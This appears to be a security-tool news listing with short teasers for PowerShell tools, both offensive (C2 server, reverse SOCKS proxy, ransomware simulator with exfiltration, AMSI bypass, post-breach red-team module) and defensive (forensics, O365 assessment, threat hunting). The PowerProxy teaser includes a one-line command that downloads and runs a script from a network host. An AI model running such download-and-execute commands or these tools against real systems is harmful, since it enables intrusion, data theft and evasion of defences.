Octopus – Open Source Pre-Operation C2 Server Based On Python And Powershell

Octopus is an open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S. The main purpose of creating Octopus is for use before any red team operation, where rather than starting the engagement with your full operational arsenal and infrastructure, you can use Octopus first to attack theRead More

PowerProxy – PowerShell SOCKS Proxy With Reverse Proxy Capabilities

PowerShell SOCKS proxy with reverse proxy capabilities. PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections. Setup Import the script: iex (new-object net.webclient).downloadstring(“http://192.168.0.22/PowerProxy.ps1”) # ORImport-Module \192.168.0.22PublicPowerProxy.ps1 reverse_proxy_handler.py canRead More

365Inspect – A PowerShell Script That Automates The Security Assessment Of Microsoft Office 365 Environments

Further the state of O365 security by authoring a PowerShell script that automates the security assessment of Microsoft Office 365 environments. Setup 365Inspect requires the administrative PowerShell modules for Microsoft Online, Azure AD (We recommend installing the AzureADPreview module), Exchange administration, Microsoft Graph, Microsoft Intune, Microsoft Teams, and Sharepoint administration. The 365Inspect.ps1 PowerShell script willRead More

Live-Forensicator – Powershell Script To Aid Incidence Response And Live Forensics

Live Forensicator is part of the Black Widow Toolbox, its aim is to assist Forensic Investigators and Incidence responders in carrying out a quick live forensic investigation. It achieves this by gathering different system information for further review for anomalous behaviour or unexpected data entry, it also looks out for unusual files or activities andRead More

PSRansom – PowerShell Ransomware Simulator With C2 Server

PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client information via HTTP. All communication between the two elements isRead More

Mandiant-Azure-AD-Investigator – PowerShell module for detecting artifacts that may be indicators of UNC2452 and other threat actor activity

This repository contains a PowerShell module for detecting artifacts that may be indicators of UNC2452 and other threat actor activity. Some indicators are “high-fidelity” indicators of compromise, while other artifacts are so called “dual-use” artifacts. Dual-use artifacts may be related to threat actor activity, but also may be related to legitimate functionality. Analysis and verificationRead More

AzureHunter – A Cloud Forensics Powershell Module To Run Threat Hunting Playbooks On Data From Azure And O365

A Powershell module to run threat hunting playbooks on data from Azure and O365 for Cloud Forensics purposes. Getting Started 1. Check that you have the right O365 Permissions The following roles are required in Exchange Online, in order to be able to have read only access to the UnifiedAuditLog: View-Only Audit Logs or AuditRead More

ADLab – Custom PowerShell Module To Setup An Active Directory Lab Environment To Practice Penetration Testing

The purpose of this module is to automate the deployment of an Active Directory lab for practicing internal penetration testing. Credits to Joe Helle and his PowerShell for Pentesters course regarding the generation of the attack vectors. Instructions Preparation Optional but recommended: Move Module into PSModulePath # Display PSModulePath$env:PSModulePath.split(“;”)# Move module to pathMove-Item .ADLab “C:Windowssystem32WindowsPowerShellv1.0Modules”Read More

PowerShx – Run Powershell Without Software Restrictions

Unmanaged PowerShell execution using DLLs or a standalone executable. Introduction PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets. Features Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe. Run Powershell without powershell.exe or powershell_ise.exe AMSI Bypass features. Run Powershell scripts directlyRead More

Azur3Alph4 – A PowerShell Module That Automates Red-Team Tasks For Ops On Objective

Azur3Alph4 is a PowerShell module that automates red-team tasks for ops on objective. This module situates in a post-breach (RCE achieved) position. Token extraction and many other tools will not execute successfully without starting in this position. This module should be used for further enumeration and movement in a compromised app that is part ofRead More

X